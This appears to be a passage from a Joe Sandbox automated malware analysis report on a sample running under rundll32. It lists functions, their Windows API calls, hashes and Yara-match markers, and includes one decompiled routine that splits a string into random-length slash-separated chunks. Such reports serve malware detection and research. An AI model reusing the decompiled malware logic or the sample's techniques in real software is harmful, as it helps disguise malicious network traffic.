                          • API ID: File$CloseCreateHandleModuleNamePointerRead
                          • String ID:
                          • API String ID: 1352878660-0
                          • Opcode ID: fac35b3e6273676e6d8c06afb5362a3e9c4bbc47acff59835762aebf4d15bd43
                          • Instruction ID: c85a4f5f272ef1f3fffe58bf79716adafd062670973513ccedc9b71fbf93a0cd
                          • Opcode Fuzzy Hash: fac35b3e6273676e6d8c06afb5362a3e9c4bbc47acff59835762aebf4d15bd43
                          • Instruction Fuzzy Hash: E91160B1A01118BBDF21AE65CC8AEFF7E7DEF01658F104495F515E2090DB75AA40DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B81C9B Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?,00000000,76CC8250,76C869A0,?,?,?,05B666C0,?,00000000,?), ref: 05B81CAB
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,05B666C0,?,00000000,?), ref: 05B81CCD
                          • lstrcpyW.KERNEL32(00000000,?), ref: 05B81CF9
                          • lstrcatW.KERNEL32(00000000,?), ref: 05B81D0C
                            • Part of subcall function 05B6B83F: strstr.NTDLL ref: 05B6B917
                            • Part of subcall function 05B6B83F: strstr.NTDLL ref: 05B6B96A
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                          • String ID:
                          • API String ID: 3712611166-0
                          • Opcode ID: 98c588b605d6ee85253b2ca561e2d698b861986214093844eed56b70b9c94c0b
                          • Instruction ID: 92bc5ae6e1f64cd1f8f188c1bfd2de9996cc5ce448133c28a1f14864b82e8d22
                          • Opcode Fuzzy Hash: 98c588b605d6ee85253b2ca561e2d698b861986214093844eed56b70b9c94c0b
                          • Instruction Fuzzy Hash: EF115672501419BFCB10AFA4CC89DEE7FADEF09250B1054A4F9059B110EB34FA01CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6A253 Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,?), ref: 05B6A28B
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B6A2A2
                          • StrChrA.SHLWAPI(00000000,0000002E), ref: 05B6A2AB
                          • GetModuleHandleA.KERNEL32(00000000), ref: 05B6A2C9
                            • Part of subcall function 05B68C35: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 05B68D0D
                            • Part of subcall function 05B68C35: VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,05B860B0,0000001C,05B7BE61), ref: 05B68D28
                            • Part of subcall function 05B68C35: RtlEnterCriticalSection.NTDLL(05B8A400), ref: 05B68D4D
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                          • String ID:
                          • API String ID: 105881616-0
                          • Opcode ID: c98f522127a1f21c77b97feed3f25e0c7b0ebafe5ebd7f1315e869e6b3c5694f
                          • Instruction ID: 85819ea3827dd4687ac023a38d1e6c1d0426309e90ee28afda8f8a4d2bd03d95
                          • Opcode Fuzzy Hash: c98f522127a1f21c77b97feed3f25e0c7b0ebafe5ebd7f1315e869e6b3c5694f
                          • Instruction Fuzzy Hash: AE213A74A40309EFCF21DFA8C948AAEBBF9FF45300F108099E406A7650DB78E981CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B81D47 Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05B81D62
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 05B81D86
                          • RegCloseKey.ADVAPI32(?), ref: 05B81DDE
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000), ref: 05B81DAF
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: QueryValue$AllocateCloseHeapOpen
                          • String ID:
                          • API String ID: 453107315-0
                          • Opcode ID: f463235065a8131b5585fc16b9c263ed5bdf380db4af3765d48e04ca32d3e4ed
                          • Instruction ID: 7ab360ff8fe3f4a74583f32cefa23807d3e48c5293f71191e245eba5bb8272ea
                          • Opcode Fuzzy Hash: f463235065a8131b5585fc16b9c263ed5bdf380db4af3765d48e04ca32d3e4ed
                          • Instruction Fuzzy Hash: 5921C4B590050CFFDF11EF99C8859EEBBBAEB48340B208496F802A7210E771AA51DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6263B Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05B7EAA8,00000000,?,00000000,05B6E842,00000000,05FBC310), ref: 05B62646
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B6265E
                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,05B7EAA8,00000000,?,00000000,05B6E842,00000000,05FBC310), ref: 05B626A2
                          • memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 05B626C3
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memcpy$AllocateHeaplstrlen
                          • String ID:
                          • API String ID: 1819133394-0
                          • Opcode ID: 50483b35660ec83f90e03a504a49644e01363ba854712997332e432cd9709529
                          • Instruction ID: 785364400053f690e8187f5cd3c5b6cd5e3f1024dd7cf183d4e52049388c8b37
                          • Opcode Fuzzy Hash: 50483b35660ec83f90e03a504a49644e01363ba854712997332e432cd9709529
                          • Instruction Fuzzy Hash: BD112C76B00114BFD7108A69DC85D6EBFEEDB81260B144176F505D7140EB74BD04C7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01004162 Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 68%
                          			E01004162(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x100a2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x100a2f0; // 0x8ed7dab7
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x100a2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                          0x0100416a
                          0x0100416d
                          0x01004173
                          0x0100418b
                          0x0100418d
                          0x01004192
                          0x01004194
                          0x01004197
                          0x01004199
                          0x0100419c
                          0x0100419e
                          0x0100419e
                          0x010041a0
                          0x010041ab
                          0x010041b0
                          0x010041c1
                          0x010041c9
                          0x010041ce
                          0x010041d1
                          0x010041d4
                          0x010041d6
                          0x010041d9
                          0x010041dc
                          0x010041dc
                          0x010041df
                          0x010041ea
                          0x010041ef
                          0x010041f9

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01001DC6,00000000,?,75BCC740,010058D7,00000000,052995B0), ref: 0100416D
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 01004185
                          • memcpy.NTDLL(00000000,052995B0,-00000008,?,?,?,01001DC6,00000000,?,75BCC740,010058D7,00000000,052995B0), ref: 010041C9
                          • memcpy.NTDLL(00000001,052995B0,00000001,010058D7,00000000,052995B0), ref: 010041EA
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: memcpy$AllocateHeaplstrlen
                          • String ID:
                          • API String ID: 1819133394-0
                          • Opcode ID: b99999ed161b2ff7d2532968313c6a47f42b48ac9a002b820d07c243855b6b15
                          • Instruction ID: fe64438a2795f74dc75b8cbd225616ade8659ffe089ffd7775820612abdc792f
                          • Opcode Fuzzy Hash: b99999ed161b2ff7d2532968313c6a47f42b48ac9a002b820d07c243855b6b15
                          • Instruction Fuzzy Hash: 0F1106B2A00215AFD722CB6DDC84E9A7FFEEB90261F054176F544D7181E7769E0487A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B721FE Relevance: 6.1, APIs: 4, Instructions: 58threadCOMMON
                          Download Yara Rule
                          APIs
                          • GlobalFix.KERNEL32(00000000), ref: 05B7223E
                          • memset.NTDLL ref: 05B72252
                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 05B7225F
                            • Part of subcall function 05B7C563: OpenProcess.KERNEL32(00000410,B8F475FF,05B72289,00000000,00000000,05B72289,0000001C,00000000,00000000,?,?,?,05B72289), ref: 05B7C5BD
                            • Part of subcall function 05B7C563: CloseHandle.KERNEL32(00000000,00000000,00000000,05B72299,00000104,?,?,?,05B72289), ref: 05B7C5DB
                            • Part of subcall function 05B7C563: GetSystemTimeAsFileTime.KERNEL32(05B72289), ref: 05B7C643
                          • GlobalUnWire.KERNEL32(00000000), ref: 05B7228A
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
                          • String ID:
                          • API String ID: 3286078456-0
                          • Opcode ID: 542f64bd568c5c702c4e033c5dcc76a5d4bc2a116340fcde5367c7298278e424
                          • Instruction ID: b1583bfa4037d11704bc9529fc6c46d088fc3bcacdc9c5307027c8b6c23d6c81
                          • Opcode Fuzzy Hash: 542f64bd568c5c702c4e033c5dcc76a5d4bc2a116340fcde5367c7298278e424
                          • Instruction Fuzzy Hash: CA115175A00209ABDF11ABB5D84BBBEBFB9EB08701F145156F916F2280EF70E501CB65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B81C1F Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                          Download Yara Rule
                          APIs
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,05B6AE46,00000000,00000000), ref: 05B81C3D
                          • GetLastError.KERNEL32(?,?,?,05B6AE46,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,05B6EBC1,?,0000001E), ref: 05B81C45
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharErrorLastMultiWide
                          • String ID:
                          • API String ID: 203985260-0
                          • Opcode ID: e9f58ef2cf7300a1d137e85cb72fe2a578841e5d1088add5a9efb45b4ab6be60
                          • Instruction ID: 951ab9453f2c8ce4f8fcf21639275da8ecb9368a47dd3b44516be7360be37bd0
                          • Opcode Fuzzy Hash: e9f58ef2cf7300a1d137e85cb72fe2a578841e5d1088add5a9efb45b4ab6be60
                          • Instruction Fuzzy Hash: 0901D4321092507FC730BA7A9C4CC7BBF6EEBC6760B101A59F875A7280DA20B801CA70
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B627E0 Relevance: 6.1, APIs: 4, Instructions: 56stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,?,?,00000000,?,?,05B61D09,?,?,?,?,?,?,?,?,?), ref: 05B627F4
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • mbstowcs.NTDLL ref: 05B6280E
                          • lstrlen.KERNEL32(?), ref: 05B62819
                          • mbstowcs.NTDLL ref: 05B62833
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 05B7BB1D
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 05B7BB29
                            • Part of subcall function 05B7BAD1: memset.NTDLL ref: 05B7BB71
                            • Part of subcall function 05B7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05B7BB8C
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(0000002C), ref: 05B7BBC4
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?), ref: 05B7BBCC
                            • Part of subcall function 05B7BAD1: memset.NTDLL ref: 05B7BBEF
                            • Part of subcall function 05B7BAD1: wcscpy.NTDLL ref: 05B7BC01
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                          • String ID:
                          • API String ID: 1961997177-0
                          • Opcode ID: 082751ff6ab37b1f5611a4b2f7e0e4d29ff151be31b2cebca6d2338b6562ccf7
                          • Instruction ID: e95f5dc556649fcac3722839edf12799a5534ddf85bd0f5acab7c854785c82f4
                          • Opcode Fuzzy Hash: 082751ff6ab37b1f5611a4b2f7e0e4d29ff151be31b2cebca6d2338b6562ccf7
                          • Instruction Fuzzy Hash: 2601B173A00208B7DF21ABB5CC89F9F7FACEF84650F1044A5F615A7140EA75FA1087A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7E03B Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,05B70D10,?,00000000,00000000), ref: 05B7E04E
                          • lstrlen.KERNEL32(05FBC178,?,05B70D10,?,00000000,00000000), ref: 05B7E06F
                          • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 05B7E087
                          • lstrcpy.KERNEL32(00000000,05FBC178), ref: 05B7E099
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                          • String ID:
                          • API String ID: 1929783139-0
                          • Opcode ID: 28a3ddff20546f842fdb7f54f4b1f3d051524a030570405ada8c1dab39223eec
                          • Instruction ID: 241c92a5805954fb480d5f7b37096fe62fa05c2c6c7a9935d5618dfcfb53f59e
                          • Opcode Fuzzy Hash: 28a3ddff20546f842fdb7f54f4b1f3d051524a030570405ada8c1dab39223eec
                          • Instruction Fuzzy Hash: 12016576904248FBC7219BA89849AAE7FBDAF49201F1440A5F916E3241DA34E505CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B61B71 Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?), ref: 05B61B7E
                          • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 05B61BA4
                          • lstrcpy.KERNEL32(00000014,?), ref: 05B61BC9
                          • memcpy.NTDLL(?,?,?), ref: 05B61BD6
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeaplstrcpylstrlenmemcpy
                          • String ID:
                          • API String ID: 1388643974-0
                          • Opcode ID: c53a74e01e7b13eb8b9898080bc9dd0db2b9ffa949478b2f3592fffca12ea777
                          • Instruction ID: e43e124735621e26891a3c1624b088e7449a3fb16ba9b37f21cd5263d6d783c8
                          • Opcode Fuzzy Hash: c53a74e01e7b13eb8b9898080bc9dd0db2b9ffa949478b2f3592fffca12ea777
                          • Instruction Fuzzy Hash: 0411587150020AEFCB21CF58D884E9ABBF9FF48704F14846AF85A9B210D775F904DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B79E10 Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,765BD3B0,?,76C85520,05B6B697,00000000,?,?,?,76CDF710,00000000,00000000), ref: 05B79E17
                          • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 05B79E2F
                          • memcpy.NTDLL(0000000C,?,00000001), ref: 05B79E45
                            • Part of subcall function 05B6A8E9: StrChrA.SHLWAPI(00000020,?,765BD3B0,05FBC304,00000000,?,05B66584,?), ref: 05B6A90E
                            • Part of subcall function 05B6A8E9: StrTrimA.SHLWAPI(00000020,05B85FCC,00000000,?,05B66584,?), ref: 05B6A92D
                            • Part of subcall function 05B6A8E9: StrChrA.SHLWAPI(00000020,?,?,05B66584,?), ref: 05B6A939
                          • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 05B79E77
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                          • String ID:
                          • API String ID: 3208927540-0
                          • Opcode ID: dc0bbc91dba92f7087b94e5b81d92df89d268efe8b40bb02d99b938d1f627b4f
                          • Instruction ID: b776f71413b38e1044ab115993773a3aa52faafac9af389b795e7b6359ededd9
                          • Opcode Fuzzy Hash: dc0bbc91dba92f7087b94e5b81d92df89d268efe8b40bb02d99b938d1f627b4f
                          • Instruction Fuzzy Hash: 77018431644705ABD7315A52EC49F3B7FAAFB80B51F045066F65AAA080DB60B80EE660
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B75261 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • RtlInitializeCriticalSection.NTDLL(05B8A400), ref: 05B75285
                          • RtlInitializeCriticalSection.NTDLL(05B8A3E0), ref: 05B7529B
                          • GetVersion.KERNEL32(?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B752AC
                          • GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B752E0
                            • Part of subcall function 05B768AC: GetModuleHandleA.KERNEL32(?,00000001,773D9EB0,00000000,?,?,?,?,00000000,05B752C3), ref: 05B768C4
                            • Part of subcall function 05B768AC: LoadLibraryA.KERNEL32(?), ref: 05B76965
                            • Part of subcall function 05B768AC: FreeLibrary.KERNEL32(00000000), ref: 05B76970
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                          • String ID:
                          • API String ID: 1711133254-0
                          • Opcode ID: 6e7cf1f51f91206b3b80c2f2b0447f3306f35e64a43bdd077b9aa88f2e071298
                          • Instruction ID: dbdad9eb23ba88487195c0b24d6759ba8dc67efffbacd10291c736cd4dba0a64
                          • Opcode Fuzzy Hash: 6e7cf1f51f91206b3b80c2f2b0447f3306f35e64a43bdd077b9aa88f2e071298
                          • Instruction Fuzzy Hash: F611A171A603049BD720AF69A886A357FA7F786230751356BF211C7280DEB87444CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B62530 Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON
                          Download Yara Rule
                          APIs
                          • RtlEnterCriticalSection.NTDLL(05B8A428), ref: 05B6253B
                          • Sleep.KERNEL32(0000000A), ref: 05B62545
                          • SetEvent.KERNEL32 ref: 05B6259C
                          • RtlLeaveCriticalSection.NTDLL(05B8A428), ref: 05B625BB
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$EnterEventLeaveSleep
                          • String ID:
                          • API String ID: 1925615494-0
                          • Opcode ID: 7f160632064d5bab5e6508c3f966da150e5dbdba7caad634a66869e6552a1f4f
                          • Instruction ID: 71fc14319782da1c42ff8e3695274ac02c2a772d2b7626d918d9f38343654f96
                          • Opcode Fuzzy Hash: 7f160632064d5bab5e6508c3f966da150e5dbdba7caad634a66869e6552a1f4f
                          • Instruction Fuzzy Hash: 6E014075654204BBEB20AB61DC5BF7A7EABEB04751F405052F606D71C0DA78BA04CBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B67BD8 Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B80DDD: lstrlen.KERNEL32(?,?,00000000,05B67BEE), ref: 05B80DE2
                            • Part of subcall function 05B80DDD: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 05B80DF7
                            • Part of subcall function 05B80DDD: wsprintfA.USER32 ref: 05B80E13
                            • Part of subcall function 05B80DDD: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 05B80E2F
                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 05B67C06
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 05B67C15
                          • CloseHandle.KERNEL32(00000000), ref: 05B67C1F
                          • GetLastError.KERNEL32 ref: 05B67C27
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                          • String ID:
                          • API String ID: 4042893638-0
                          • Opcode ID: 47fa9e7774320ee262521eb46151581537cf72ac35ebbead0ac8ea7b62a22e2f
                          • Instruction ID: c2ea553509ccb97a82db5cf7950c12cf0f0b42fc8566f2a03c2d91e9e8ab1c36
                          • Opcode Fuzzy Hash: 47fa9e7774320ee262521eb46151581537cf72ac35ebbead0ac8ea7b62a22e2f
                          • Instruction Fuzzy Hash: A3F0D172204218BBD7202E69DC8DFAB7F6EFF056A1F205115F90AA2080DE38A540C6E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B688FA Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • InterlockedExchange.KERNEL32(05B8A060,00000000), ref: 05B68906
                          • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 05B68921
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B6894A
                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 05B6896B
                            • Part of subcall function 05B6DC41: SetEvent.KERNEL32(00000000,?,05B7507B), ref: 05B6DC56
                            • Part of subcall function 05B6DC41: WaitForSingleObject.KERNEL32(?,000000FF,?,?,05B7507B), ref: 05B6DC76
                            • Part of subcall function 05B6DC41: CloseHandle.KERNEL32(00000000,?,05B7507B), ref: 05B6DC7F
                            • Part of subcall function 05B6DC41: CloseHandle.KERNEL32(00000000,?,?,05B7507B), ref: 05B6DC89
                            • Part of subcall function 05B6DC41: RtlEnterCriticalSection.NTDLL(?), ref: 05B6DC91
                            • Part of subcall function 05B6DC41: RtlLeaveCriticalSection.NTDLL(?), ref: 05B6DCA9
                            • Part of subcall function 05B6DC41: CloseHandle.KERNEL32(00000000), ref: 05B6DCC5
                            • Part of subcall function 05B6DC41: LocalFree.KERNEL32(?), ref: 05B6DCD0
                            • Part of subcall function 05B6DC41: RtlDeleteCriticalSection.NTDLL(?), ref: 05B6DCDA
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                          • String ID:
                          • API String ID: 1103286547-0
                          • Opcode ID: 9b3c4b42a36dfaba9bf4ce065173bc5c81d594d2c68071aed84f61195a77d655
                          • Instruction ID: ac87ba3800ee5527cc874f1efe5ce8e6225e88c4f48a53639b05b5d64f529e6e
                          • Opcode Fuzzy Hash: 9b3c4b42a36dfaba9bf4ce065173bc5c81d594d2c68071aed84f61195a77d655
                          • Instruction Fuzzy Hash: A3F0C2323502117BDB302A25EC0FF663F6AEB81B31F142051B605EB2C0DE69B805D7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B74A4B Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcatW.KERNEL32(?,?), ref: 05B74A5D
                            • Part of subcall function 05B6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 05B6F3DB
                            • Part of subcall function 05B6F39B: GetLastError.KERNEL32 ref: 05B6F3E5
                            • Part of subcall function 05B6F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 05B6F40A
                            • Part of subcall function 05B6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 05B6F42D
                            • Part of subcall function 05B6F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 05B6F455
                            • Part of subcall function 05B6F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 05B6F46A
                            • Part of subcall function 05B6F39B: SetEndOfFile.KERNEL32(00001000), ref: 05B6F477
                            • Part of subcall function 05B6F39B: CloseHandle.KERNEL32(00001000), ref: 05B6F48F
                          • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,05B6E4AF,?,?,00001000,?,?,00001000), ref: 05B74A80
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,05B6E4AF,?,?,00001000,?,?,00001000), ref: 05B74AA2
